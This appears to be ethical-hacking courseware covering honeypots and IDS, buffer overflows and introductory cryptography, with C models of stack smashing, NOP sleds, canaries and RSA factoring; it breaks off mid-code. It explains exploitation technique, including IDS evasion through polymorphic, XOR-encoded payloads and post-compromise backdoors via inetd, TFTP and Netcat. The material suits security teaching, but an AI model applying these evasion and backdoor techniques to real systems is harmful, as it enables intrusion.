[Diagram: Honeywall gateway in front of the honeypots, with the Sebek server collecting the captured data]
Physical and Virtual Honeypots

Physical honeypots

• A physical honeypot is a real machine on the network with its own IP address

• Physical honeypots are often high-interaction, allowing the system to be compromised completely; they are expensive to install and maintain

Virtual honeypots

• A virtual honeypot is simulated by another machine that responds to network traffic sent to the virtual honeypot

• For large address spaces, it is impractical or impossible to deploy a physical honeypot for each IP address. In that case, virtual honeypots can be deployed
Tools to Detect Honeypots

© Send-Safe Honeypot Hunter

• Send-Safe Honeypot Hunter is a tool designed for checking lists of HTTPS and SOCKS proxies for so-called "honeypots"

© Nessus Security Scanner

• The Nessus Security Scanner includes NASL (Nessus Attack Scripting Language), a language designed to write security tests easily and quickly

• Nessus has the ability to test SSL-ized services such as https, smtps, imaps, and more. Nessus can be provided with a certificate so that it can be integrated into a PKI-fied environment
Countermeasures

© Incident response team

Set up an "incident response team." Identify those people who should be called whenever people suspect an intrusion in progress.

© Response procedure

Priorities between network uptime and intrusion should be decided. Whether or not to pull the network plug on suspecting intrusion should be decided. Should continued intrusion be allowed in order to gather evidence against the intruder?

© Lines of communication

Mode of propagating the information through corporate hierarchies, from the immediate supervisor up to the CEO. Decision to inform the FBI or police. Notifying partners (vendors/customers).
Summary

© Intrusion Detection Systems (IDS) monitor packets on the network wire and attempt to discover if an attacker is trying to break into a system

© System Integrity Verifiers (SIV) monitor system files to find when an intruder changes them. Tripwire is one of the popular SIVs

© Intrusion detection happens either by anomaly detection or signature recognition

© A network IDS contains a special TCP/IP stack that reassembles IP datagrams and TCP streams before inspecting them

© Honeypots are programs that simulate one or more network services that are designated on a computer's ports

© A simple protocol verification system can flag invalid packets. This can include valid, but suspicious, behavior such as several fragmented IP packets

© In order to effectively detect intrusions that use invalid protocol behavior, an IDS must re-implement a wide variety of application-layer protocols to detect suspicious or invalid behavior

© One of the easiest and most common ways for an attacker to slip by a firewall is by installing network software on an internal system that uses a port address permitted by the firewall's configuration
Ethical Hacking

Module XX
Buffer Overflows

Module Objective

© Why are programs/applications vulnerable?

© What is a buffer overflow?

© Reasons for buffer overflow attacks

© Skills required

© Types of buffer overflow

© Understanding stacks

© Shellcode

© How to detect buffer overflows in a program

© Technical details

© Defense against buffer overflows
Flow Diagram for the Module

[Flow diagram: Why are programs/applications vulnerable? → Types of buffer overflows → Reasons for buffer overflow attacks → Skills required → Understanding stacks → Shellcode → Understanding assembly code → Attacking a real program → Detecting buffer overflows → Countermeasures]
Scenario

It was a job that Tim wanted right from the start of his career. Being a Project Manager of a well-known software firm was definitely a sign of prestige. But now his credibility was at stake!!!

The last project that Tim handled failed to deliver because the application crashed. The customer of Tim's company suffered a huge financial loss.

At the back of his mind, something was nagging Tim...

Had he asked his Test Engineers to do a thorough testing of the delivered package, this would not have happened...

Scenario (cont.)

Since the project was running behind schedule, he had to hurry through testing.

Tim had worked with the same team for his previous projects. In addition, all the other projects had successful conclusions. Therefore, he was under the notion that nothing would possibly go wrong. This notion made him over-confident about the testing of this project.

But this time, he was not lucky. The web server of the client company had succumbed to a buffer overflow attack. This was due to a flaw in coding, as bounds were not checked.

Is Tim's decision justified?
Now, what's next?
Real World Scenario

On Oct. 19, 2000, hundreds of flights were grounded or delayed because of a software problem in the Los Angeles air traffic control system. The cause was attributed to a Mexican controller typing 9 (instead of 5) characters of flight-description data, resulting in a buffer overflow.
Why are Programs/Applications Vulnerable?

© Since there is a lot of pressure on the deliverables, programmers are bound to make mistakes which are overlooked most of the time

© Boundary checks are not done or in most cases they are skipped

© Programming languages such as C, which programmers still use to develop packages or applications, leave memory safety entirely to the programmer

© The strcat(), strcpy(), sprintf(), vsprintf(), bcopy(), gets(), and scanf() calls in the C language can be exploited because these functions don't check to see if the buffer, allocated on the stack, is large enough for the data copied into the buffer

© Good programming practices are not adhered to
Buffer Overflows

A buffer overrun is when a program allocates a block of memory of a certain length and then tries to stuff too much data into the buffer, with the extra overflowing and overwriting possibly critical information crucial to the normal execution of the program. Consider the following source code:

When the source is compiled and the program is run, it reserves 5 bytes on the stack for target and 11 bytes for attacker. The strcpy() copies 15 bytes (fourteen D's plus the terminating NUL) into the 11-byte attacker buffer, so the excess overwrites whatever the compiler placed next to attacker on the stack; with a typical layout that is target, and the printf() shows D's instead of TTTT. Modern compilers may reorder the locals or add stack protection, so the exact symptom varies, but the write past the end of attacker is always out of bounds

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char target[5] = "TTTT";           /* 4 characters plus the terminating NUL */
    char attacker[11] = "AAAAAAAAAA";  /* 10 characters plus NUL */

    /* 14 D's plus NUL = 15 bytes copied into an 11-byte buffer: the
       deliberate overflow this slide is about */
    strcpy(attacker, "DDDDDDDDDDDDDD");

    printf("%s\n", target);
    return 0;
}

This type of vulnerability is prevalent in UNIX- and NT-based systems
Reasons for Buffer Overflow Attacks

© Buffer overflow attacks depend on two things: the lack of
boundary testing and a machine that can execute code that
resides in the data/stack segment.

© Lack of boundary checking is very common, and usually the
program simply ends with a segmentation fault or bus error. In order to
exploit a buffer overflow to gain access or escalate privileges, the
offender must craft the data to be fed to the application.

© Random data will generate a segmentation fault or bus error,
never a remote shell or the execution of a command.
Knowledge Required to Program
Buffer Overflow Exploits

1. C functions and the stack

2. A little knowledge of assembly/machine language

3. How system calls are made (at the machine code level)

4. exec() system calls

5. How to guess some key parameters
Types of Buffer Overflows

© Stack-Based Buffer Overflow
© Heap/BSS-Based Buffer Overflow
Stack-Based Buffer Overflow

© The buffer is expecting a maximum number of guests (x).

© Send the buffer more than x guests.

© If the system does not perform boundary checks, extra
guests continue to be placed at positions beyond the
legitimate locations within the buffer. (Java does not
permit running off the end of an array or string as C and
C++ do.)

© Malicious code can be pushed on the stack.

© The overflow can overwrite the return pointer so that
the flow of control switches to the malicious code.
Understanding Assembly Language

Two most important operations on a stack:

• 1. Push - put one item on the top of the stack

• 2. Pop - "remove" one item from the top of the stack

• Pop typically returns the contents pointed to by a pointer and
changes the pointer (not the memory contents)

EIP The extended instruction pointer. This points to the code that you are currently
executing. When you call a function, this gets saved on the stack for later use; that
saved copy is the return pointer a stack overflow aims to overwrite.

ESP The extended stack pointer. This points to the current position on the stack
and allows things to be added and removed from the stack using push and pop
operations or direct stack pointer manipulations.

EBP The extended base pointer. This register should stay the same throughout
the lifetime of the function. It serves as a static point for referencing stack-based
information like variables and data in a function using offsets. It points to the base
of the current function's stack frame, which is where the top of the stack was at the
moment the function's prologue ran.
Understanding the Stack

© The stack is a (LIFO)
mechanism that
computers use both to
pass arguments to
functions and to
reference local variables

© It acts like a buffer,
holding all of the
information that the
function needs

© The stack is created at
the beginning of a
function and released at
the end of it

[Figure: stack frame layout, showing the bottom of memory and the top of
memory, the base pointer (BP) which can reference anywhere within the stack
frame, and a local buffer ("Buffer 2") inside the frame.]

A Normal Stack

[Figure: two stack frames, listed from the bottom of memory towards the top:
args, saved instruction pointer (return address), saved registers, local
variables; then, for the called function: args, saved registers, local
variables. The stack top is at the bottom of the figure.]
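The program on the Buffer Overflows slide and the stack figures above describe the same event from two sides. As an added example (not part of the courseware), the following C model lays one frame out the way the figure shows it, low address first: the two local buffers, the saved EBP, then the saved EIP. It then runs the slide's strcpy() against that frame, once with the slide's 14 D's and once with input long enough to reach the return address, beside a bounds-checked copy that refuses both. The order of the locals, the saved-EBP value and the return address are assumptions; real compilers may order or pad locals differently.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame layout (low address first), following the figure above. The order of
 * the locals and the control-data values are assumed for illustration. */
enum {
    ATTACKER_LEN  = 11,                            /* char attacker[11] */
    TARGET_LEN    = 5,                             /* char target[5]    */
    OFF_ATTACKER  = 0,
    OFF_TARGET    = OFF_ATTACKER + ATTACKER_LEN,   /* 11 */
    OFF_SAVED_EBP = OFF_TARGET + TARGET_LEN,       /* 16 */
    OFF_RET       = OFF_SAVED_EBP + 4,             /* 20 */
    FRAME_SIZE    = OFF_RET + 4                    /* 24 */
};

typedef struct { unsigned char mem[FRAME_SIZE]; } frame_t;

static void put32(unsigned char *p, uint32_t v)    /* little-endian, as on x86 */
{
    p[0] = (unsigned char)v;         p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16); p[3] = (unsigned char)(v >> 24);
}

static uint32_t get32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* The frame as it looks just before the strcpy() in the program above. */
void frame_init(frame_t *f)
{
    memset(f->mem, 0, FRAME_SIZE);
    memcpy(f->mem + OFF_ATTACKER, "AAAAAAAAAA", ATTACKER_LEN);
    memcpy(f->mem + OFF_TARGET, "TTTT", TARGET_LEN);
    put32(f->mem + OFF_SAVED_EBP, 0xBFFFF5E8u);   /* assumed saved EBP */
    put32(f->mem + OFF_RET, 0x08048456u);         /* assumed return address */
}

/* What strcpy(attacker, src) does: copy strlen(src)+1 bytes, no bounds check.
 * Returns the byte count the real call would write; the model clips the write
 * at the end of the frame so that it stays well-defined for testing. */
size_t unchecked_copy(frame_t *f, const char *src)
{
    size_t n = strlen(src) + 1;                   /* data plus terminating NUL */
    memcpy(f->mem + OFF_ATTACKER, src, n < (size_t)FRAME_SIZE ? n : (size_t)FRAME_SIZE);
    return n;
}

/* The bounds-checked alternative: refuse input that does not fit together
 * with its NUL terminator and leave the frame untouched. */
int checked_copy(frame_t *f, const char *src)
{
    size_t n = strlen(src) + 1;
    if (n > ATTACKER_LEN)
        return -1;                                /* caller must handle the error */
    memcpy(f->mem + OFF_ATTACKER, src, n);
    return 0;
}

const char *frame_target(const frame_t *f) { return (const char *)f->mem + OFF_TARGET; }
uint32_t    frame_ret(const frame_t *f)    { return get32(f->mem + OFF_RET); }

/* One-shot helpers: run a single copy against a fresh frame and report. */
static frame_t scratch;
const char *target_after_unchecked(const char *src)
{
    frame_init(&scratch); unchecked_copy(&scratch, src); return frame_target(&scratch);
}
uint32_t ret_after_unchecked(const char *src)
{
    frame_init(&scratch); unchecked_copy(&scratch, src); return frame_ret(&scratch);
}
int checked_copy_result(const char *src)
{
    frame_init(&scratch); return checked_copy(&scratch, src);
}

int main(void)
{
    /* The slide's 14 D's: 15 bytes into an 11-byte buffer overwrite target[]. */
    printf("target after 14 D's : \"%s\"\n", target_after_unchecked("DDDDDDD" "DDDDDDD"));

    /* 20 filler bytes cover attacker, target and the saved EBP; the next four
     * bytes land on the return address (constructed marker value 0xDEADBEEF). */
    printf("return address now  : 0x%08X\n",
           ret_after_unchecked("DDDDDDDDDD" "DDDDDDDDDD" "\xEF\xBE\xAD\xDE"));

    printf("checked_copy result : %d\n", checked_copy_result("DDDDDDD" "DDDDDDD"));
    return 0;
}
```

The distance from the start of the overflowed buffer to the saved EIP (20 bytes here) is exactly the "key parameter" the attacker has to guess; the checked version never lets the copy reach it.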
Shellcode

© Shellcode is the code an attacker injects (typically to
spawn a shell) when exploiting stack-based overflows

© Shellcodes exploit computer bugs in how the
stack is handled

© Buffers are soft targets for attackers as they
overflow very easily if the conditions match



Heap-Based Buffer Overflow

© Variables that are dynamically allocated with
functions such as malloc() are created on the
heap.

© The heap is memory that is dynamically
allocated. It is different from the memory that
is allocated for the stack and for code.

© In a heap-based buffer overflow attack, an
attacker overflows a buffer that is placed lower
in the heap, overwriting adjacent heap data
(other dynamically allocated variables and the
allocator's own bookkeeping), which can have
unexpected and unwanted effects.
How to Detect Buffer Overflows in a
Program

There are two ways to detect buffer overflows:

• The first one is looking at the source code. In this
case, the hacker can look for strings declared as local
variables in functions or methods and verify the
presence of boundary checks. It is also necessary to
check for improper use of standard functions,
especially those related to strings and input/output.

• The second way is by feeding the application with
huge amounts of data and checking for abnormal
behavior.
Attacking a Real Program

© Assuming that a string function is being exploited, the
attacker can send a long string as the input

© This string overflows the buffer and causes a
segmentation error

© The return pointer of the function is overwritten and
the attacker succeeds in altering the flow of execution

© If he has to insert his code in the input, he has to:

• Know the exact address on the stack

• Know the size of the stack

• Make the return pointer point to his code for execution
© Most CPUs have a No
Operation (NOP)
instruction - it does
nothing but advance
the instruction
pointer.

© Usually we can put
some of these ahead
of our program (in
the string).

© As long as the new
return address points
to a NOP, we are OK.

The attacker pads the beginning of the
intended buffer overflow with a
long run of NOP instructions (a
NOP slide or sled) so the CPU will
do nothing until it gets to the 'main
event' (which precedes the 'return
pointer' in the string).

Most intrusion detection systems
(IDS) look for signatures of NOP
sleds. ADMmutate (by K2) accepts a
buffer overflow exploit as input
and randomly creates a
functionally equivalent version
(polymorphism).
How to Mutate a Buffer Overflow
Exploit

For the NOP portion

Randomly replace the NOPs with functionally
equivalent segments of code (e.g.: x++; x--; in place of NOP NOP).

For the "main event"

Apply XOR to combine the code with a random key so that it is
unintelligible to the IDS. The exploit must then carry a small
decoder that restores the gibberish at run time before it can
execute; the decoder itself is polymorphic and therefore hard to
spot.

For the "return pointer"

Randomly tweak the LSB of the pointer to land in the NOP
zone.
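The two slides above describe the NOP sled and the NOP-substitution trick from the attacker's side and mention only that an IDS looks for the sled's signature. The following C model, added here and not taken from the courseware or from ADMmutate, shows both sides: a run-length NOP detector of the kind a signature IDS uses, a buffer builder that lays out sled, payload and repeated return pointer, and a check of why an imprecise return-pointer guess still "lands in the NOP zone". The detector threshold, the sled length, the return address and the payload bytes are constructed values; the payload is a placeholder, not working shellcode.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* x86 single-byte opcodes used by the model: 0x90 = nop; 0x41 = inc ecx and
 * 0x49 = dec ecx form a pair with no net effect (the "x++; x--" idea from the
 * slide). PAYLOAD_MARK (int3) stands in for the 'main event'; it is a
 * placeholder byte, not working shellcode. */
enum { NOP = 0x90, INC_ECX = 0x41, DEC_ECX = 0x49, PAYLOAD_MARK = 0xCC };

/* Naive IDS signature: the longest run of consecutive NOP bytes. */
size_t longest_nop_run(const unsigned char *buf, size_t len)
{
    size_t best = 0, run = 0;
    for (size_t i = 0; i < len; i++) {
        run = (buf[i] == NOP) ? run + 1 : 0;
        if (run > best) best = run;
    }
    return best;
}

/* Flag the buffer when the run reaches the detector's threshold. */
int ids_flags_nop_sled(const unsigned char *buf, size_t len, size_t threshold)
{
    return longest_nop_run(buf, len) >= threshold;
}

/* Assemble [sled][payload][return address x ret_copies]. With mutate = 0 the
 * sled is plain 0x90 bytes; with mutate = 1 every pair of sled bytes becomes
 * inc ecx / dec ecx, which reaches the same end state but no longer matches
 * the 0x90-run signature. Returns the number of bytes written, 0 on error. */
size_t build_buffer(unsigned char *out, size_t cap, size_t sled_len,
                    const unsigned char *payload, size_t payload_len,
                    uint32_t ret, size_t ret_copies, int mutate)
{
    size_t pos = 0;
    if (sled_len + payload_len + 4 * ret_copies > cap || sled_len % 2)
        return 0;
    for (size_t i = 0; i < sled_len; i++)
        out[pos++] = mutate ? (unsigned char)((i % 2) ? DEC_ECX : INC_ECX)
                            : (unsigned char)NOP;
    memcpy(out + pos, payload, payload_len);
    pos += payload_len;
    for (size_t i = 0; i < ret_copies; i++) {           /* little-endian, as on x86 */
        out[pos++] = (unsigned char)ret;
        out[pos++] = (unsigned char)(ret >> 8);
        out[pos++] = (unsigned char)(ret >> 16);
        out[pos++] = (unsigned char)(ret >> 24);
    }
    return pos;
}

/* Why the sled tolerates an imprecise guess: every sled byte is a complete
 * one-byte instruction, so any address inside [sled_base, sled_base+sled_len)
 * executes straight down into the payload. sled_base is the assumed address
 * of the first sled byte in the victim's memory. */
int lands_in_sled(uint32_t sled_base, size_t sled_len, uint32_t guess)
{
    return guess >= sled_base && (uint64_t)guess < (uint64_t)sled_base + sled_len;
}

/* Demo buffer (all values constructed): 64-byte sled, 4 placeholder payload
 * bytes, return address 0xBFFFF5A0 repeated 4 times. */
static unsigned char demo[256];
static const unsigned char demo_payload[4] = { PAYLOAD_MARK, PAYLOAD_MARK, PAYLOAD_MARK, PAYLOAD_MARK };

size_t build_demo(int mutate)
{
    return build_buffer(demo, sizeof demo, 64, demo_payload, 4, 0xBFFFF5A0u, 4, mutate);
}

/* IDS verdict on the demo buffer with a 16-byte run threshold (constructed). */
int demo_ids_verdict(int mutate)
{
    size_t len = build_demo(mutate);
    return ids_flags_nop_sled(demo, len, 16);
}

int main(void)
{
    printf("plain sled   : IDS flags = %d (nop run %zu)\n",
           demo_ids_verdict(0), longest_nop_run(demo, build_demo(0)));
    printf("mutated sled : IDS flags = %d (nop run %zu)\n",
           demo_ids_verdict(1), longest_nop_run(demo, build_demo(1)));
    printf("guess 0xBFFFF5A0 with sled at 0xBFFFF580: %s\n",
           lands_in_sled(0xBFFFF580u, 64, 0xBFFFF5A0u) ? "lands in sled" : "misses");
    return 0;
}
```

The mutated sled defeats only this byte-run signature; a detector that disassembles the buffer and looks for long runs of any side-effect-free instructions, or one that watches for the repeated return address instead, still catches it, which is why the slide lists the return pointer and the main event as separate things to mutate.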
Once the Stack is Smashed...

Once the vulnerable process is commandeered, the
attacker has the same privileges as the process and can
gain normal access. He can then exploit a local buffer
overflow vulnerability to gain super-user access.

Create a backdoor

• Using (UNIX-specific) inetd

• Using Trivial FTP (TFTP), included with Windows 2000
and some UNIX flavors

Use Netcat to make a raw, interactive connection

Shoot back an X terminal connection

• UNIX-specific GUI
Defense Against Buffer Overflows

© Manual auditing of
code

© Disabling stack
execution

© Safer C library
support

© Compiler
techniques
Tool to Defend Buffer Overflow:
Return Address Defender (RAD)

© RAD is a simple patch for the compiler that
automatically creates a safe area to store a copy
of return addresses

© After that, RAD automatically adds protection
code into applications that it compiles to defend
programs against buffer overflow attacks

© RAD does not change the stack layout
Tool to Defend against Buffer
Overflow: StackGuard

© StackGuard: Protects systems from stack smashing
attacks.

© StackGuard is a compiler approach for defending
programs and systems against "stack smashing" attacks.

© Programs that have been compiled with StackGuard are
largely immune to stack smashing attacks.

© Protection requires no source code changes at all. When
a vulnerability is exploited, StackGuard detects the
attack in progress, raises an intrusion alert, and halts
the victim program.

http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/
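The slide says what StackGuard does but not how. Its mechanism is a canary word that the compiler's prologue places between the local variables and the saved return address and that the epilogue re-checks before the function returns; an overflow that runs up to the return pointer has to pass through the canary and changes it. The following C model, added here and not StackGuard's own code, plays that prologue/epilogue pair against the same kind of unchecked strcpy() as on the earlier slides, and also shows the two cases a practitioner should know: an attacker who has learned the canary value can write it back in place, and a canary that contains a NUL byte cannot be reproduced by a string copy at all. The frame layout, the canary values and the addresses are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame layout (low address first): local buffer, canary, saved EBP, return
 * address. The sizes and the control-data values are assumed for illustration. */
enum {
    BUF_LEN    = 8,
    OFF_BUF    = 0,
    OFF_CANARY = OFF_BUF + BUF_LEN,     /* 8  */
    OFF_EBP    = OFF_CANARY + 4,        /* 12 */
    OFF_RET    = OFF_EBP + 4,           /* 16 */
    FRAME_SIZE = OFF_RET + 4            /* 20 */
};

typedef struct { unsigned char mem[FRAME_SIZE]; } gframe_t;

static void put32(unsigned char *p, uint32_t v)      /* little-endian, as on x86 */
{
    p[0] = (unsigned char)v;         p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16); p[3] = (unsigned char)(v >> 24);
}

static uint32_t get32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Prologue as StackGuard instruments it: store the canary word just below the
 * saved EBP and return address. */
void prologue(gframe_t *f, uint32_t canary, uint32_t ret)
{
    memset(f->mem, 0, FRAME_SIZE);
    put32(f->mem + OFF_CANARY, canary);
    put32(f->mem + OFF_EBP, 0xBFFFF5E8u);          /* assumed saved EBP */
    put32(f->mem + OFF_RET, ret);
}

/* The unprotected strcpy(buf, src) in the function body: strlen+1 bytes, no
 * bounds check. The model clips at the end of the frame to stay well-defined. */
void body_strcpy(gframe_t *f, const char *src)
{
    size_t n = strlen(src) + 1;
    memcpy(f->mem + OFF_BUF, src, n < (size_t)FRAME_SIZE ? n : (size_t)FRAME_SIZE);
}

/* Epilogue as StackGuard instruments it: before 'ret', compare the canary with
 * the value the prologue stored. 1 = frame intact, 0 = smashed (StackGuard
 * raises the alert and halts the program instead of returning). */
int epilogue_ok(const gframe_t *f, uint32_t canary)
{
    return get32(f->mem + OFF_CANARY) == canary;
}

/* One instrumented call: prologue, vulnerable copy, epilogue check. Returns the
 * epilogue verdict and, through ret_out, the return address now in the frame. */
int guarded_call(uint32_t canary, const char *input, uint32_t *ret_out)
{
    gframe_t f;
    prologue(&f, canary, 0x08048456u);             /* assumed legitimate return address */
    body_strcpy(&f, input);
    if (ret_out) *ret_out = get32(f.mem + OFF_RET);
    return epilogue_ok(&f, canary);
}

uint32_t ret_after_call(uint32_t canary, const char *input)
{
    uint32_t ret = 0;
    guarded_call(canary, input, &ret);
    return ret;
}

int main(void)
{
    const uint32_t canary = 0x5A3C7E91u;          /* stands in for a random per-process canary */
    /* 16 filler bytes reach the return address, clobbering the canary on the way. */
    const char *smash = "DDDDDDDD" "DDDDDDDD" "\xEF\xBE\xAD\xDE";
    /* Same overwrite, but with the (leaked) canary written back in its place. */
    const char *smash_known = "DDDDDDDD" "\x91\x7E\x3C\x5A" "DDDD" "\xEF\xBE\xAD\xDE";
    /* A canary with a NUL byte: the string copy stops at the NUL and never
     * reaches the bytes beyond it, so the return address stays out of reach. */
    const char *past_nul = "DDDDDDDD" "\xFF\x0A";

    printf("short input       : ok=%d\n", guarded_call(canary, "hello", NULL));
    printf("overflow          : ok=%d ret=0x%08X\n",
           guarded_call(canary, smash, NULL), ret_after_call(canary, smash));
    printf("canary known      : ok=%d ret=0x%08X\n",
           guarded_call(canary, smash_known, NULL), ret_after_call(canary, smash_known));
    printf("terminator canary : ok=%d ret=0x%08X\n",
           guarded_call(0x00000AFFu, past_nul, NULL), ret_after_call(0x00000AFFu, past_nul));
    return 0;
}
```

The third case is why the canary has to be unpredictable and must not be readable through some other bug, and the fourth is the reason for StackGuard's "terminator" canary: a word made of NUL, CR, LF and EOF bytes stops string and line-oriented copy routines before they can rewrite it.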
Tool to Defend Buffer Overflow:
Immunix System

© Immunix System 7 is an Immunix-enabled RedHat
Linux 7.0 distribution and suite of application-level
security tools.

© Immunix secures a Linux OS and applications.

© Immunix works by hardening existing software
components and platforms so that attempts to exploit
security vulnerabilities will fail safe. That is, the
compromised process halts instead of giving control to
the attacker, and is then restarted.

http://immunix.org
Vulnerability Search - ICAT

[Screenshot of the ICAT search page. Recoverable text: "ICAT contains 5905
vulnerabilities. Last updated: 07/24/03. ICAT is a searchable index of
information on computer vulnerabilities. It provides search capability at a
fine granularity and links users to vulnerability and patch information."
Search tips: all drop-down menus are ANDed together to create a query; click a
link to look up vulnerabilities by vendor or product name; '_' represents
non-alphabetic characters; double quotes are ignored in text search and
individual words are ANDed together. Search fields: vendor, product, version,
keyword search (try a CVE or CAN name), severity, time range (all entries /
1 year / 6 months / 3 months), and general filters (common sources, related
exploit range, vulnerability consequence, vulnerability type, exposed
component type, entry type, entries since a given date). The example query
shown selects vendor "microsoft", severity "High", related exploit range
"Remote", vulnerability type "buffer overflow", entry type "CVE entries",
year 2003.]
Summary

© A buffer overflow occurs when a program or process
tries to store more data in a buffer (temporary data
storage area) than it was intended to hold

© Buffer overflow attacks depend on two things: the lack
of boundary testing and a machine that can execute
code that resides in the data/stack segment

© Buffer overflow vulnerabilities can be detected by skilled
auditing of the code as well as boundary testing

© Once the stack is smashed, the attacker can deploy his
payload and take control of the attacked system

© Countermeasures include: checking the code, disabling
stack execution, safer C library support, and using safer
compiler techniques

© Tools like StackGuard, Immunix, and vulnerability
scanners help in securing systems
Ethical Hacking

Module XXI
Cryptography

Module Objective

© What is PKI

© RSA
© MD-5
© SHA
© SSL
© PGP
© SSH

© Encryption Cracking Techniques
Module Flow

Description of PKIs
Digital ...
RSA and Attacks
SSL Description
... Description
MD5 Description
GAK Description
RSA Challenge
Hacking Tools
Public-key Cryptography

© Public-key cryptography was invented in 1976 by
Whitfield Diffie and Martin Hellman.

© In this system, each person gets a pair of keys, called
the public key and the private key.

© Each person's public key is published while the private
key is kept secret.

© Anyone can send a confidential message using public
information, but it can only be decrypted with a private
key that is in the sole possession of the intended
recipient.
Working of Encryption

RSA (Rivest Shamir Adleman)

© RSA is a public-key cryptosystem developed by MIT
professors Ronald L. Rivest, Adi Shamir, and Leonard
M. Adleman in 1977 in an effort to help ensure Internet
security.

© RSA uses modular arithmetic and elementary number
theory to do computations using two very large prime
numbers.

© RSA encryption is widely used and is the de-facto
standard for public-key encryption.
Example of RSA Algorithm

P  = 61    <- first prime number (destroy this after computing E and D)
Q  = 53    <- second prime number (destroy this after computing E and D)
PQ = 3233  <- modulus (give this to others)
E  = 17    <- public exponent (give this to others)
D  = 2753  <- private exponent (keep this secret!)

Your public key is (E, PQ).
Your private key is D.

The encryption function is:

    encrypt(T) = (T^E) mod PQ
               = (T^17) mod 3233

The decryption function is:

    decrypt(C) = (C^D) mod PQ
               = (C^2753) mod 3233

To encrypt the plaintext value 123, do this:

    encrypt(123) = (123^17) mod 3233
                 = 337587917446653715596592958817679803 mod 3233
                 = 855

To decrypt the ciphertext value 855, do this:

    decrypt(855) = (855^2753) mod 3233
                 = 123
RC4, RC5, RC6, Blowfish

Algorithm   Features

RC4         It is a variable key-size stream cipher with byte-oriented
            operations and is based on the use of a random
            permutation.

RC5         It is a parameterized algorithm with a variable block
            size, key size, and a variable number of rounds.

RC6         RC6 adds two features to RC5: the inclusion of integer
            multiplication and the use of four w-bit working registers
            instead of RC5's two (w is the word size, e.g. 32 bits).

Blowfish    It is a 64-bit block cipher that uses a key length that can
            vary between 32 and 448 bits.
© 40-bit key algorithms are of no use.

© 56-bit key algorithms offer only modest privacy: a 56-bit key
is within reach of a determined brute-force effort.

© 64-bit algorithms are safe today but will soon be
threatened as technology evolves.

© Algorithms with 128-bit and larger keys are, for practical
purposes, unbreakable by brute force.

© 256-bit and larger keys are beyond any foreseeable
brute-force effort.
Brute-Force Attack

Estimated Time for a Successful Brute-Force Attack

Power / cost                                      40 bits    56 bits    64 bits    128 bits
                                                  (5 chars)  (7 chars)  (8 chars)  (16 chars)
$2K   (1 PC; can be achieved by an individual)    1.4 min    73 days    50 years   10^... years
$100K (can be achieved by a company)              2 sec      35 hours   1 year     10^... years
$1M   (achieved by a huge organization or a ...)  0.2 sec    3.5 hours  37 days    10^... years

(The exponents in the 128-bit column are not legible in the source.)
RSA Attacks

© Brute forcing RSA factoring

© Esoteric attack

© Chosen ciphertext attack

© Low encryption exponent attack

© Error analysis

© Other attacks
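The worked RSA example earlier in the module and the first item in the list above ("brute forcing RSA factoring") belong together, so one added example covers both; it is not code from the courseware. It carries the slide's numbers through in C: key generation from the two primes (Q = 53 as given, P = 61 as PQ/Q), the public exponent E = 17, the private exponent recovered by the extended Euclidean algorithm, square-and-multiply for the modular powers, and finally the attack, which factors the public modulus by trial division and rebuilds D from (PQ, E) alone. Trial division is my illustration of the "brute force" item; it is instant for a 12-bit modulus and hopeless at the 576 to 2048-bit sizes of the RSA Challenge numbers, which is the point of those key sizes.

```c
#include <stdint.h>
#include <stdio.h>

/* Square-and-multiply: base^exp mod m, for m below 2^32 so that every
 * intermediate product fits in 64 bits. */
uint64_t modpow(uint64_t base, uint64_t exp, uint64_t m)
{
    uint64_t result = 1;
    base %= m;
    while (exp) {
        if (exp & 1) result = result * base % m;
        base = base * base % m;
        exp >>= 1;
    }
    return result;
}

/* Modular inverse of a modulo m via the extended Euclidean algorithm;
 * returns 0 when a and m are not coprime (no inverse exists). */
uint64_t modinv(uint64_t a, uint64_t m)
{
    int64_t t = 0, new_t = 1;
    int64_t r = (int64_t)m, new_r = (int64_t)(a % m);
    while (new_r) {
        int64_t q = r / new_r, tmp;
        tmp = t - q * new_t; t = new_t; new_t = tmp;
        tmp = r - q * new_r; r = new_r; new_r = tmp;
    }
    if (r != 1) return 0;
    return (uint64_t)(t < 0 ? t + (int64_t)m : t);
}

typedef struct { uint64_t n, e, d; } rsa_key_t;

/* Key generation from two primes and a chosen public exponent, exactly the
 * steps of the worked example. Returns 0 on success, -1 if e is not
 * invertible modulo (p-1)(q-1). */
int rsa_keygen(uint64_t p, uint64_t q, uint64_t e, rsa_key_t *k)
{
    uint64_t phi = (p - 1) * (q - 1);
    uint64_t d = modinv(e, phi);
    if (d == 0) return -1;
    k->n = p * q; k->e = e; k->d = d;
    return 0;
}

uint64_t rsa_encrypt(const rsa_key_t *k, uint64_t m) { return modpow(m, k->e, k->n); }
uint64_t rsa_decrypt(const rsa_key_t *k, uint64_t c) { return modpow(c, k->d, k->n); }

/* Round-trip m through a key built from (p, q, e); returns the decrypted value. */
uint64_t rsa_roundtrip(uint64_t p, uint64_t q, uint64_t e, uint64_t m)
{
    rsa_key_t k;
    if (rsa_keygen(p, q, e, &k) != 0) return (uint64_t)-1;
    return rsa_decrypt(&k, rsa_encrypt(&k, m));
}

/* The brute-force attack: factor the public modulus by trial division.
 * Returns the smaller prime factor, or 0 if none is found. */
uint64_t factor_modulus(uint64_t n)
{
    for (uint64_t f = 2; f * f <= n; f++)
        if (n % f == 0) return f;
    return 0;
}

/* With the factors known, the attacker rebuilds the private exponent from
 * nothing but the public key (n, e). */
uint64_t recover_d(uint64_t n, uint64_t e)
{
    uint64_t p = factor_modulus(n);
    if (p == 0) return 0;
    return modinv(e, (p - 1) * (n / p - 1));
}

int main(void)
{
    rsa_key_t k;
    rsa_keygen(61, 53, 17, &k);                        /* P, Q and E from the slide */
    uint64_t c = rsa_encrypt(&k, 123);
    printf("n=%llu e=%llu d=%llu\n", (unsigned long long)k.n,
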